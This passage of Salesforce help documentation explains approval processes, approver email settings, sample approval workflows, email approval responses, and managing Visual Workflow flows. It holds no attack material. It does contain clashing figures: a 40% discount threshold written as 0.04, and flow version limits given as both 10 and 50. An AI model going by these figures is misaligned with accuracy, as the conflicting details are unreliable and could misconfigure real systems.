◊ If the approval request needs to go to the user's direct manager and there is no direct manager for that user.
◊ If the approval process has a field update that fails standard validation rules for the field. This could happen for a field

that isn't visible on the user's page layout.

Note:  Field updates don’t evaluate custom validation rules on fields.

• An error message displays for the user submitting an approval request for an entitlement or service contract if both these
conditions are met:

◊ The approval process includes Record Owner as an initial submitter.
◊ The user submitting the approval request isn't the owner of the account associated with the entitlement or service

contract.

Approvals and Queues

• Queues are only available on specific objects.
• You can't use email approval response with approval processes in which the assigned approver is a queue.
• You can't assign a group or queue as a delegated approver.
• When the assigned approver is a queue:

◊ Any queue member can approve or reject an approval request that is assigned to the queue.
◊ When an approval request is assigned to a queue, the email notification is sent to the email address for the queue.

Depending on your queue settings, an email notification is also sent to each queue member.
◊ When an approval request is assigned to a queue, each queue member's delegated approver also receives an approval

request email notification.
◊ Because email notifications to a queue aren’t intended for an external audience, any instances of the merge field

{!ApprovalRequest.External_URL} in the email template are sent as the equivalent internal URL.
◊ When an approval request is rejected and returned to the previous approver and the previous approver was a queue, the

approval request is assigned to the user who approved it, instead of the queue.
◊ The Approval History related list displays the queue name in the Assigned To column and the actual user who

approved or rejected the approval request in the Actual Approver column.

Limitations

• There is a limit of 15 steps per process.
• There is a limit of 25 approvers per step.
• You can't create outbound messages for approval processes on junction objects.
• After an approval process is activated, you can't add, delete, or change the order of the steps or change reject or skip behavior

for that process, even if you make the process inactive.
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• The Status field cannot be updated by approval processes. If you want to use the contract status as part of an approval
process, we recommend creating a custom status field.

Approvals and Merge Fields

• Approval process merge fields can be used in email templates, but not mail merge templates.
• Merge fields in the approval request email are set to the submitter's name and the name of the first step.
• When the request is approved, the merge fields update to the most recent approver's name and the name of the second

step, if applicable.
• For subsequent actions, merge field values are updated based on the previous completed step.

Changing Your Approval User Preferences
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view approval processes:

Permissions vary depending on the approval process settingsTo approve, reject, or reassign approval requests:

The Approver Settings section of the User detail page lets you set your preferences for receiving approval request emails,
including opting not to receive them at all.

To set up or edit your Approver Settings:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information, then click Edit.
• If you clicked My Settings, select Personal > Approver Settings.

3. Optionally, select your Delegated Approver.

Note: You can't assign a group or queue as a delegated approver.

4. Optionally, enter your Manager.
5. Set your preference for receiving approval request emails. The options are:

• If I am an approver or delegated approver

• Only if I am an approver

• Only if I am a delegated approver

• Never—If you select this option, you won't receive any approval request emails, even if your organization has email
approval response enabled. However, if the assignee of an approval step is a queue, selecting Never might not block
all approval request emails, depending the queue settings.
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6. Click Save.

When an approval request email is sent to the assigned approver, the delegated approver also receives an email notification
that there is an approval request to review. Delegated approvers can't reassign approval requests; they can only approve or
reject approval requests.

Note: When an approval request is assigned to a queue, each queue member's delegated approver also receives an
approval request email notification.

Examples of Approval Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval.

Use these samples of common approval processes to help you get started creating your own:

• Sample Approval Process: PTO Requests

• Sample Approval Process: Expense Reports

• Sample Approval Process: Discounting Opportunities

• Sample Approval Process: Job Candidates

Note: If your organization has both Approvals and Chatter enabled, administrators can turn on Approvals in Chatter,
which lets users receive approval requests as posts in their Chatter feeds.

Sample Approval Process: PTO Requests

Available in: Enterprise, Unlimited, and Developer Editions

Most companies require employees to file a PTO (Paid Time Off) request and have their manager approve it. In three phases,
here's how to automate a simple one-step PTO request process using Salesforce.

Prep Your Organization

Before creating the approval process:

3209

Examples of Approval ProcessesUsing Approval Processes



• If you do not yet have a custom object to track your PTO requests, create a custom object and tab called PTO Requests.
Add the appropriate fields for your PTO Requests such as Start Date, End Date, and Employee Name. See Defining
Custom Objects on page 2877 and Defining Custom Tabs on page 2837.

• Create an email template to notify approvers that an approval request needs to be reviewed. Be sure to include one of the
approval process merge fields to take users directly to the approval page.

Create the Approval Process

Use the jump start wizard to create an approval process for the PTO Request custom object and specify the following:

• Select the email template you created for this approval process.
• Don't specify filter criteria if you want each user to submit PTO requests and have them included regardless of their

attributes.
• Select the Automatically assign an approver using a standard or custom hierarchy field option,

then choose Manager.
• The jump start wizard automatically chooses the record owner as the only person who can submit PTO requests.

Tip:  If you want the submitter to be able to withdraw a submitted PTO request:

1. Click Edit and choose Initial Submitters.
2. Select Allow submitters to recall approval requests.

If the Allow submitters to recall approval requests option is selected for the approval process, both submitters and
administrators can see the Recall Approval Request button in the Approval History related list on the detail page
of submitted records; otherwise, only administrators can see it. When a user clicks Recall Approval Request, the
pending approval request for the record is withdrawn and recall actions are run. For more information, see Recall
Actions on page 3183.

Wrap Things Up

After creating the approval process, add the Approval History related list to the PTO Request object page layout. See
Customizing Page Layouts on page 2813.

Tip:  Consider adding the Items To Approve related list to your custom home page layouts. It gives users an instant
view of the approval requests they need to approve or reject. For instructions on adding this component to your home
page layouts, see Designing Home Tab Page Layouts on page 2829.

If available, use your sandbox to test the approval process, then activate it.

Sample Approval Process: Expense Reports

Available in: Enterprise, Unlimited, and Developer Editions

If your company requires that employees file expense reports for managers to approve, you can automate this process in
Salesforce. Use this example to create a two-step expense report approval process for all employees in your headquarters office.
It specifies that expenses less than $50 are automatically approved, those $50 and over require manager approval, and those
over $5,000 require additional approval from two VPs. This example highlights the “else” option, as well as the parallel approvals
feature.
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Prep Your Organization

Before creating the approval process:

• If you do not yet have a custom object to track your expenses, create a custom object and tab called Expense Reports. See
Defining Custom Objects on page 2877 and Defining Custom Tabs on page 2837. Add the appropriate fields such as Amount,
Description, Status, Start Date, and End Date.

• Create an email template to notify approvers that an approval request needs to be reviewed. Be sure to include one of the
approval process merge fields to take users directly to the approval page.

• Create a custom field on the user object called Office Location. Assign the “HQ” value to users in the headquarters
office location.

Create the Approval Process

Create an approval process using the Expense Report custom object and specify the following:

• The filter criteria for this approval process is Current User: Office Location equals HQ. Records must meet
this criteria before they can be submitted to this approval process.

• Choose the Manager field as the next automated approver.
• Create an email template to notify approvers that an approval request needs to be reviewed. Be sure to include one of the

approval process merge fields to take users directly to the approval page.
• Choose the record owner or any other user who you want to be able to submit expense reports.
• Create two approval steps:

1. Create a step named Step 1: Manager Approval with the following specifications:

◊ Name this step Step 1: Manager Approval.
◊ Select Enter this step if the following and choose criteria are met. Also, choose approve record for

the else option.
◊ Set the filter criteria to: Expense: Amount greater or equal 50.
◊ In the Automatically assign to approver(s) option, select the manager of the user submitting the request.
◊ If appropriate, choose The approver's delegate may also approve this request if you want to

allow the user in the Delegated Approver field to approve requests.

2. Create a second approval step named Step 2: Multiple VP Approval and specify the following:

◊ Use the filter criteria Expense Amount greater or equal 5000.
◊ Choose Automatically assign to approver(s) and select two users with a VP role.
◊ Select the Require UNANIMOUS approval from all selected approvers option. The request will not

be approved unless both designated users approve.
◊ If appropriate, choose The approver's delegate may also approve this request if you want to

allow the user in the Delegated Approver field to approve requests.
◊ Choose Perform ONLY the rejection actions for this step... so that the request returns to the

manager for changes if one of the VPs rejects the request.

Tip:  Consider creating the following final approval actions:

• Define a field update to automatically change the Status field to “Approved.”
• Send an approval notification to the user who submitted the expense report.
• Send an outbound message to your backoffice financial system to print a reimbursement check.
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Wrap Things Up

After creating the approval process, add the Approval History related list to the Expense Report object page layout. See
Customizing Page Layouts on page 2813.

Tip:  Consider adding the Items To Approve related list to your custom home page layouts. It gives users an instant
view of the approval requests they need to approve or reject. For instructions on adding this component to your home
page layouts, see Designing Home Tab Page Layouts on page 2829.

If available, use your sandbox to test the approval process, then activate it.

Sample Approval Process: Discounting Opportunities

Available in: Enterprise, Unlimited, and Developer Editions

Opportunities that are discounted more than 40% require a CEO approval. Use this example to create a one-step approval
process.

Prep Your Organization

Before creating the approval process:

• Create an email template to notify approvers that an approval request needs to be reviewed. Be sure to include one of the
approval process merge fields to take users directly to the approval page.

• Create the following custom fields for opportunities:

◊ A percent field called Discount Percent so that users can enter a percentage discount.
◊ A checkbox field called Discount Approved to indicate whether the CEO approved the discount.

Create the Approval Process

Create an approval process on the Opportunity object and specify the following:

• The filter criteria for this approval process is Discount Percent greater or equal 0.04. Records must meet
this criteria before they can be submitted to this approval process.

• You don't need to choose a custom field as the next automated approver because you will specify later in the process that
the CEO must approve all requests.

• Select the email template you created for this approval process.
• Choose the record owner as the only user who can submit a discount request for approval.
• Create one approval step with no filter criteria because all records submitted will need to be approved or rejected. See

Creating Approval Steps on page 3173.
• Choose Automatically assign to approver(s) and select the name of your CEO.
• If appropriate, choose The approver's delegate may also approve this request if you want to allow the

user in the Delegated Approver field to approve requests.
• Consider creating the following final approval actions:

◊ Send an approval notification to the user who submitted the discount request.
◊ Define a field update to automatically select the opportunity Discount Approved checkbox field.
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Wrap Things Up

After creating the approval process, add the Approval History related list to the appropriate opportunity page layouts. See
Customizing Page Layouts on page 2813.

Tip:  Consider adding the Items To Approve related list to your custom home page layouts. It gives users an instant
view of the approval requests they need to approve or reject. For instructions on adding this component to your home
page layouts, see Designing Home Tab Page Layouts on page 2829.

If available, use your sandbox to test the approval process, then activate it.

Sample Approval Process: Job Candidates

Available in: Enterprise, Unlimited, and Developer Editions

When your company interviews candidates for a position, you may have several levels of approval before you can send an offer
letter. Use this example to create a three-step approval process that requires approval from multiple management levels.

Prep Your Organization

Before creating the approval process:

• If you don't yet have a custom object to track candidates, create a custom object and tab called Candidates. See Defining
Custom Objects on page 2877 and Defining Custom Tabs on page 2837. Add the appropriate fields such as Salary, Offer
Extended (checkbox), and Date of Hire.

• Create an email template to notify approvers that an approval request needs to be reviewed. Be sure to include one of the
approval process merge fields to take users directly to the approval page.

Create the Approval Process

Create an approval process on the Candidate custom object using the following specifications:

• Don't enter filter criteria because you want all submitted offers to be approved.
• Choose the Manager field as the next automated approver.
• Select the email template you created for this approval process.
• Choose the record owner or any other user that you want to be able to submit offer letters.
• Create three approval steps:

1. Create a step named Step 1: Manager Approval:

◊ No filter is necessary as you want all records to advance to this step.
◊ In the Automatically assign to approver(s) option, select the manager of the user submitting the request.
◊ If appropriate, choose The approver's delegate may also approve this request if you want to

allow the user in the Delegated Approver field to approve requests.

2. Create a second step named Step 2: VP Approval:

◊ No filter is necessary as you want all records to advance to this step.
◊ Choose Let the user choose the approver to allow the manager to select the appropriate VP to approve

the request.
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◊ If appropriate, choose The approver's delegate may also approve this request if you want to
allow the user in the Delegated Approver field to approve requests.

◊ Choose Perform ONLY the rejection actions for this step... so that the request returns to the
manager for changes if the VP rejects the request.

3. Create a third step named Step 3: CFO Approval:

◊ No filter is necessary as you want all records to advance to this step.
◊ Choose Automatically assign to approver(s) and select the name of your CFO.
◊ If appropriate, choose The approver's delegate may also approve this request if you want to

allow the user in the Delegated Approver field to approve requests.
◊ Choose Perform all rejection actions for this step AND all final rejection actions.

(Final Rejection) so that offer letters rejected by your CFO are completely rejected.

Tip:

• Consider creating the following final approval actions:

◊ Send an approval notification to the user who submitted the offer letter request.
◊ Define a field update to select the Offer Extended checkbox field.

• Consider creating the following final rejection actions:

◊ Send a notification to the manager that the offer won't be extended.

Wrap Things Up

After creating the approval process, add the Approval History related list to the Candidates object page layout. See Customizing
Page Layouts on page 2813.

Tip:  Consider adding the Items To Approve related list to your custom home page layouts. It gives users an instant
view of the approval requests they need to approve or reject. For instructions on adding this component to your home
page layouts, see Designing Home Tab Page Layouts on page 2829.

If available, use your sandbox to test the approval process, then activate it.

Email Approval Response FAQ
Available in: Enterprise, Unlimited, and Developer Editions

• What is email approval response?

• How do I enable email approval response?

• Can I use a mobile device (such as a BlackBerry) to approve and reject approval requests?

• I tried to reply but got this error message: “Your workflow approval message was not processed.” What should I do?

• I tried to reply but my email approval response wasn’t delivered. What should I do?

• Why am I not receiving any email approval requests?

• Who should I contact if I do not receive email approval requests?
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• Can I respond to email approval requests in languages other than English?

• What if the approval request has already been approved or rejected by another user?

What is email approval response?
The email approval response feature gives users the ability to approve or reject email approval requests by replying to the email.
Approvers must have the “API Enabled” system permission to approve or reject approval requests via email.

The first line of the email body may contain one of the following words:

• approve
• approved
• yes
• reject
• rejected
• no

Periods and exclamation marks are also accepted at the end of the word. You can also optionally add comments in the second
line of the email body. Users can still click a link in the email to access the approval page as well. This feature is especially
useful for organizations with users who receive approval requests on mobile devices.

Note:  By enabling the email approval response feature, you agree to allow salesforce.com to process email approval
responses, update approval requests for all active users in your organization, and update the approval object on behalf
of your organization's users.

How do I enable email approval response?
To enable email approval response for your organization, from Setup, click Create > Workflow & Approvals > Settings,
select the Enable Email Approval Response checkbox, and click Save.

Can I use a mobile device (such as a BlackBerry) to approve and reject
approval requests?

Yes. Use the standard mobile device email client and respond to the approval request email by sending a reply with the word
“approve,” “approved,” “yes,” “reject,” “rejected,” or “no” in the first line of the email body. You can also add comments in the
second line.

I tried to reply but got this error message: “Your workflow approval
message was not processed.” What should I do?

Make sure you reply using the same email address that received the email approval request.
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I tried to reply but my email approval response wasn’t delivered. What
should I do?

Approvers must have the “API Enabled” system permission to approve or reject approval requests via email. Contact your
administrator.

Why am I not receiving any email approval requests?
You might not receive the email approval requests that you expect because:

• Email delivery time can vary based on your ISP or connection.
• Your email content might be caught by a spam filter on your mail server. Contact your email administrator, who can check

the logs of all inbound email to see if it's being delivered, rejected, or marked as spam.
• Your Salesforce email addresses might need to be white-listed by your email administrator.

Who should I contact if I do not receive email approval requests?
Contact your email administrator, who can check the logs of all inbound email to see if it's being delivered, rejected, or marked
as spam.

Can I respond to email approval requests in languages other than English?
Yes. Email approval response works in all languages that Salesforce supports.

What if the approval request has already been approved or rejected by
another user?

An email approval request can only be processed once. If another user has responded to the approval request before you do,
you'll get an error.
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Approval Process Terminology
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Various user permissions required depending on the actionTo use approvals:

The following terminology is used for approval processes in Salesforce:

Approval Actions

An approval action is an action that occurs as a result of an approval process. There are four types of approval actions:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority,
and Due Date of the task.

Task

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the
new value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the
data you want to include in the message.

Outbound Message

Approval steps, initial submission, final approvals, final rejections, and recalls can execute approval actions. Both approval
processes and workflow rules share actions.

Approval Process

An approval process is an automated process your organization can use to approve records in Salesforce. An approval
process specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply
to all records included in the process, or just records that meet certain administrator-defined criteria. An approval process
also specifies the actions to take when a record is approved, rejected, recalled, or first submitted for approval.

Approval Request

An approval request is an email or a Chatter post notifying the recipient that a record was submitted for approval and
that his or her approval is requested.

Approval Steps

Approval steps assign approval requests to various users and define the chain of approval for a particular approval process.
Each approval step specifies the attributes a record must have to advance to that approval step, the user who can approve
requests for those records, and whether to allow the delegate of the approver to approve the requests. The first approval
step in a process also specifies the action to take if a record does not advance to that step. Subsequent steps in the process
also allow you to specify what happens if an approver rejects the request.
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Assigned Approver

The assigned approver is the user responsible for approving an approval request.

Delegated Approver

A delegated approver is a user appointed by an assigned approver as an alternate for approval requests. Delegated approvers
can't reassign approval requests; they can only approve or reject approval requests.

Email Approval Response

The email approval response feature gives users the ability to approve or reject email approval requests by replying to the
email. Approvers must have the “API Enabled” system permission to approve or reject approval requests via email.

The first line of the email body may contain one of the following words:

• approve

• approved

• yes

• reject

• rejected

• no

Periods and exclamation marks are also accepted at the end of the word. You can also optionally add comments in the
second line of the email body. Users can still click a link in the email to access the approval page as well. This feature is
especially useful for organizations with users who receive approval requests on mobile devices.

To enable email approval response, see Customizing Workflow and Approval Settings on page 3145.

Note: Before enabling email approval response, note that you cannot use this feature with approval processes
in which the assigned approver is a queue, or in a multi-step approval process in which the next approver is
manually chosen after the first step. Also, users that use Microsoft® Word as their email editor must add the
comments to the end of the first line of the reply email instead of the second.

Initial Submission Actions

Initial submission actions are the actions that occur when a user first submits a record for approval. By default, an action
to lock the record runs automatically on initial submission. Initial submission actions can include any approval actions
such as email alerts, field updates, tasks, or outbound messages. For example, an initial submission action can update a
custom approval status field to “In Progress.”

Final Approval Actions

Final approval actions are the actions that occur when all required approvals have been given for a record. Final approval
actions can include email alerts, field updates, tasks, or outbound messages. For example, a final approval action can
change the status to “Approved” and send an email notification.

Final Rejection Actions

Final rejection actions are the actions that occur when an approver rejects the request and it goes to the final rejection
state. Final rejection actions can include email alerts, field updates, tasks, or outbound messages. For example, a final
rejection action can change the status to “Rejected,” send an email notification, and unlock the record so that users can
edit it before resubmitting.
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Outbound Message

An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint
you designate, such as an external service. An outbound message sends the data in the specified fields in the form of a
SOAP message to the endpoint.

Recall Actions

Recall actions are the actions that occur when a submitted approval request is recalled. By default, an action to unlock
the record runs automatically on recall. Recall actions can include email alerts, field updates, tasks, or outbound messages.
For example, a recall action can change the status of a request from “In Progress” to “Not Submitted.”

Record Locking

Record locking is the process of preventing users from editing a record, regardless of field-level security or sharing
settings. Salesforce automatically locks records that are pending approval. Users must have the “Modify All” object-level
permission for the given object, or the “Modify All Data” permission, to edit locked records. The Initial Submission
Actions, Final Approval Actions, Final Rejection Actions, and Recall Actions related lists contain Record Lock actions
by default. You cannot edit this default action for initial submission and recall actions. You can still add campaign
members to campaigns locked for approval.

See Also:
Approval Processes Overview
Getting Started with Approval Processes
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USING VISUAL WORKFLOW

Visual Workflow Overview
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view a flow:

“Run Flows”

OR

Force.com Flow User field enabled on the user detail page

OR

“Manage Force.com Flow”

To run a flow from:
• Flow detail page

• Flow URL

• Visualforce tab or page pointing to the flow URL

• Custom Web tab, link, or button pointing to the flow
URL or to the URL of a Visualforce page that embeds the
flow

“Manage Force.com Flow”To run an inactive flow:

To run a flow from within the Cloud Flow Designer:

To open, edit, or create a flow in the Cloud Flow Designer:

To activate, deactivate, or delete a flow, or to edit flow
properties:

Visual Workflow allows administrators to build applications, known as flows, that guide users through screens for collecting
and updating data. For example, you can use Visual Workflow to script calls for a customer support center or to generate
real-time quotes for a sales organization.

Visual Workflow has three different aspects: flow design, flow management, and runtime. As an administrator, you create the
flows using the Cloud Flow Designer, which has a drag-and-drop user interface that lets you diagram flow structure and
configure how it runs, without writing any code. Once you create a flow, you can manage it in Salesforce, edit its properties,
activate, deactivate, delete, or run it at will. Flow users can then run the active flow from a custom button, tab, link, or directly
from the flow URL.

To get started using flows, from Setup, click Create > Workflow & Approvals > Flows. From the list page, you can:

• Create a new flow.

• Open a flow. If there is no version of the flow activated, Open launches the latest version.

• View details about a flow by clicking its name.

• Edit the name or description of a flow.
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• See flow status.

See Also:
Putting Flows to Work
Managing Your Flows
Running Flows

What's the Difference Between Workflow and Visual Workflow?
Even though they have similar names, Workflow and Visual Workflow are completely separate Salesforce features for automating
business processes.

Workflow enables you to set up workflow rules that identify what kinds of record changes or additions trigger specified workflow
actions, such as sending email alerts and updating record fields.

Visual Workflow enables you to create flows, which are applications that are user-triggered instead of event-triggered. Unlike
Workflow, which always executes rules and actions behind the scenes, Visual Workflow offers screens for displaying and
collecting information from the user running the flow.

Unlike workflow rules and actions, which are associated with a specific object (and can cross objects only to update fields on
a related master record), flows can look up, create, update, and delete records for multiple objects.

In case you’re wondering, the “visual” in Visual Workflow refers to the ability to visually build flows using the Cloud Flow
Designer. Its drag-and-drop user interface lets administrators easily build flows without writing any code.

See Also:
Workflow and Approvals Overview
Visual Workflow Overview

Visual Workflow Accessibility Overview
Available in: Enterprise, Unlimited, and Developer Editions

Visual Workflow is 508-compliant with the following exceptions:

• Clicking the next or previous buttons doesn't change the title of the screen, so you may not realize you're on a new page.

• There are no labels on radio buttons. Screen readers can't distinguish between questions.

• Questions without defined prompts may not read correctly.

• Errors are not noted when reading the fields.
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Managing Your Flows
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view a flow:

“Run Flows”

OR

Force.com Flow User field enabled on the user detail page

OR

“Manage Force.com Flow”

To run a flow from:
• Flow detail page

• Flow URL

• Visualforce tab or page pointing to the flow URL

• Custom Web tab, link, or button pointing to the flow
URL or to the URL of a Visualforce page that embeds the
flow

“Manage Force.com Flow”To run an inactive flow:

To run a flow from within the Cloud Flow Designer:

To open, edit, or create a flow in the Cloud Flow Designer:

To activate, deactivate, or delete a flow, or to edit flow
properties:

You can have several different versions of a single flow in Salesforce, but only one version of each flow can be active at a time.

To manage a flow, from Setup, click Create > Workflow & Approvals > Flows and click a flow name.

On the flow detail page you can:

• View a list of all versions of the flow. By default, flow versions are sorted by Created Date.

• Activate a version of the flow.

Note: When you activate a new version of a flow, the previously activated version (if one exists) is automatically
deactivated. Flow processes currently running continue to run using the version with which they were initiated.

• Delete a flow or flow version.

◊ Click the Delete button to delete the flow completely, including all versions.

◊ Click the Del link in the Flow Versions list to delete inactive versions of the flow.

Note: You can’t delete an active flow. Once deactivated, you must wait 12 hours to delete a flow or flow version.
This ensures that flows in progress have time to complete. Flows that have never been activated can be deleted
immediately.

• Open a flow or flow version. Only users with the “Manage Force.com Flow” permission can open flows.
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◊ Click the Open button to open the active version of the flow. If there is no version of the flow activated, Open launches
the latest version.

◊ Click the Open link in the Flow Versions list to open a specific version of the flow.

Note:  You can’t make direct changes to an active flow. If you open an active version of a flow, you can make
edits, but you can’t save those edits unless you save as either a new flow or new flow version.

• Run a flow or flow version.

◊ Click the Run button to run the active version of the flow. If there is no active version, the Run button runs the latest
version.

◊ Click the Run link next to the version name to run an individual flow version. Only users with the “Manage Force.com
Flow” permission can run inactive flows.

Note:  To allow other Salesforce users to run active flows directly, create a custom Web tab, link, or button pointing
to the flow URL. Include the namespace prefix in the flow URL when pointing users to a flow installed from a
package. If the flow contains subflow elements and you want to call the latest version of each referenced flow,
append ?latestSub=true to the URL.

Users running flows this way must have the “Run Flows” permission or have the Force.com Flow User field
enabled on their user detail page.

• Edit the name or description of the flow.

• See the flow namespace prefix, if it was installed from a managed package. The Cloud Flow Designer can’t open flows
installed from managed packages.

• See flow status. Inactive flows are valid and can be activated. Draft flows are inactive, invalid, and can’t be activated.

• Deactivate the active version of the flow.

See Also:
Visual Workflow Overview
Flow Limits

Creating a Flow

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

To create a flow in the Cloud Flow Designer, from Setup, click Create > Workflow & Approvals > Flows and click New
Flow.
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Tips and Tricks for Creating Flows

• Have a draft flow in mind before you start creating your flow in the Cloud Flow Designer.
• If you're not sure what kind of element you need for a node in your flow, use a Step element as a placeholder until you

figure it out. You can always replace it later.
• If you need to delete a group of elements and connectors, you can left-click and drag to select an area containing them.

Then press DELETE to remove all of them at once.
•

You can copy ( ) and paste ( ) selected elements on the canvas, too.

If you're new to the Cloud Flow Designer, we recommend walking through one or more of the sample flow tutorials in the
Cloud Flow Designer Workbook. They're a great way to introduce yourself to the tool and discover how things work.

See Also:
Managing Your Flows

Saving a Flow

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

After you've created a flow in the Cloud Flow Designer, you have a few options for saving it:

• Initial save—When you save a new flow for the first time, a dialog box appears. Enter a flow name, unique name and
description. Once you save the flow, the unique name can't be changed.

Note: A unique name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

• Quick save—After you've saved a flow once, the Save button works as a quick-save, overwriting your previous work.
However, the Save button doesn’t work when editing active flows. You must use Save As to save your changes as a new
version or new flow.

• Save As—Once you've saved your flow for the first time, this button is enabled, with two options:

◊ Save as new flow opens a dialog box where you can input a new name, unique name and description, then save your
changes as an entirely new flow.

◊ Save as new version saves the flow you're working on as a new version of the current flow. This is a useful option if
you want to make changes to a flow and keep the old configuration as a backup in case you need to refer back to it later.

Each flow can have up to 10 versions. You can update the flow name and description when you save a new version, but
not the unique name.

When saving a flow or flow version:
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• If you have the flow detail page open in one browser tab, then open a flow version in a new browser tab to edit it, after
saving and closing it, you must refresh the first flow detail page before you can successfully run the flow version you just
edited.

• If you've changed the flow properties and for some reason the save fails, the flow properties don't revert to the previous
values.

See Also:
Flow Designer Overview

Editing Flow Properties

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view a flow:

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

To activate, deactivate, or delete a flow, or to edit flow
properties:

The name and description of a flow in Salesforce make up the flow properties. The properties of a flow and its flow versions
are separate.

If you haven't yet edited the flow properties, and you activate a version of the flow, the name and description fields are
automatically updated to reflect those of the active version. Once you edit the name and description of your flow, the fields
are no longer automatically updated to match the active version.

To edit the properties of a flow:

1. From Setup, click Create > Workflow & Approvals > Flows.
2. Choose one of the following options:

• Click Edit next to the flow name.
• Click the flow name, and then click Edit.

• Click Open next to the flow name, and then click .

3. Edit and save the flow properties.

See Also:
Visual Workflow Overview
Flow Designer Overview
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Running Flows

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view a flow:

“Run Flows”

OR

Force.com Flow User field enabled on the user detail page

To run a flow as a user directly from the flow URL, or from
a custom Web tab, link, or button pointing to the flow URL:

“Manage Force.com Flow”To run a flow from the flow detail page, list page, or from
within the Cloud Flow Designer, or to run an inactive flow:

Flows are a collection of scripted screens that you can step through to collect and update data. For example, as a support
representative in a call center, you can use flows to capture information as you help troubleshoot customer issues. Or as a
salesperson, you can use flows to generate real-time quotes. You can even use flows to manipulate your organization's data in
new ways.

Depending on how flows are set up in your organization, you can run them directly from the flow URL in your browser, or
from a custom Web tab, link, or button pointing to the URL.

If your administrator hasn't defined custom Web tabs, links, or buttons for flows, you can find the direct flow URL. From
Setup, click Create > Workflow & Approvals > Flows, then click on the name of the flow you want to run.

Consider the following when running flows:

• Don't use your browser's Back or Forward buttons to navigate through a flow. This may result in inconsistent data between
the flow and Salesforce.

• A single flow may have up to 50 different versions. When you run a flow, you see the active version, which may not
necessarily be the latest version.

Flow administrators can also run flows directly from the flow detail page.

See Also:
Visual Workflow Overview
Putting Flows to Work
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Putting Flows to Work
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and set version settings for Visualforce pages:

“Customize Application”To create and edit custom buttons, links, and web tabs:

You can share flows with users in three ways.

Embed flows in a Visualforce page and incorporate that page into a Force.com app with a custom button, link, or
Visualforce tab

Use this method when the people who’ll be using your flow are all users in your organization and you want to customize
the flow’s look and feel.

For example, this method is appropriate if you’re using flows to script calls for your company’s customer support center
and you want to design a custom tab from which they can select a script to use. Or, if you want to customize the way
leads are created in Salesforce, you can override the New button on the Leads home page and have it point to a custom
Visualforce page with an embedded flow that captures only the lead information you want.

Users running a flow delivered this way must have access to the Visualforce page. They must also have the “Run Flows”
permission, or their user detail page must have the Force.com Flow User field enabled.

Embed flows in a Visualforce page and incorporate that page into a Force.com site, Customer Portal, or Partner
Portal

Use this method when you want to share a flow with members of the public who aren’t standard users in your organization.

For example, this method is appropriate if you want to set up a self-service tool for your public Force.com site to help
visitors generate custom sales quotes. Since the flow is embedded in a Visualforce page, you can customize the appearance
of the flow so it uses your company’s branding and style.

Site and portal users running a flow delivered this way must have access to the Visualforce page. They don’t need any
other permissions.

Note: When making a flow available to site or portal users, be sure to point them to the URL of the Visualforce
page that contains the embedded flow, not to the URL of the flow itself. Site and portal users don’t have the
privileges to run flows directly.

Give users access to the flow URL, either directly or through a custom button, link or web tab

Use this method when the people who’ll be using your flow are all users in your organization and you don’t need to
customize its look and feel.

You can find the direct URL of a flow on its detail page: From Setup, click Create > Workflow & Approvals > Flows.
Include the namespace prefix in the flow URL when pointing users to a flow installed from a managed package. If the
flow contains subflow elements and you want to call the latest version of each referenced flow, append ?latestSub=true
to the URL.
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Users running flows this way must have the “Run Flows” permission or have the Force.com Flow User field enabled
on their user detail page.

See Also:
Setting Flow Finish Behavior
Managing Force.com Site Visualforce Pages
Creating Web Tabs

DESIGNING YOUR FLOWS

Flow Designer Overview

Watch a Demo: Visual Workflow Cloud Flow Designer Overview (2:27 minutes)

The Flow Designer, the tool for creating flows, lets you configure screens and define branching logic for your flows without
writing any code.

Elements are the building blocks of flows. Each element represents an action, such as presenting information to, or collecting
information from, flow users, or even querying, creating, updating, and deleting information in Salesforce. By connecting
elements together in the Flow Designer, you can create a flow, which is a series of screens, inputs, and outputs through which
users navigate.

For a collection of useful resources, including videos and sample flows, open the Cloud Flow Designer and click Get Started.

System Requirements

To use the Cloud Flow Designer, we recommend:

• Windows® Internet Explorer® versions 8 and 9, Google® Chrome™, or Mozilla® Firefox®. Internet Explorer 6 is not
supported.

• Adobe® Flash® Player version 10.1 and later. The minimum version required to run the Cloud Flow Designer is 10.0.
• A minimum browser resolution of 1024x768.

See Also:
Flow Designer Elements
Flow Designer Resources
Understanding the Flow Designer User Interface
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Understanding the Flow Designer User Interface
Available in: Enterprise, Unlimited, and Developer Editions

Visual Workflow allows administrators to build applications, known as flows, that guide users through screens for collecting
and updating data. For example, you can use Visual Workflow to script calls for a customer support center or to generate
real-time quotes for a sales organization.

The Flow Designer user interface has several functional areas.

Button Bar (1)

Use the buttons in the button bar to save, close, undo or redo changes to, run, or view properties of your flow. The status
indicator on the right side of the bar shows whether your flow is active or inactive, saved or unsaved, and whether you got any
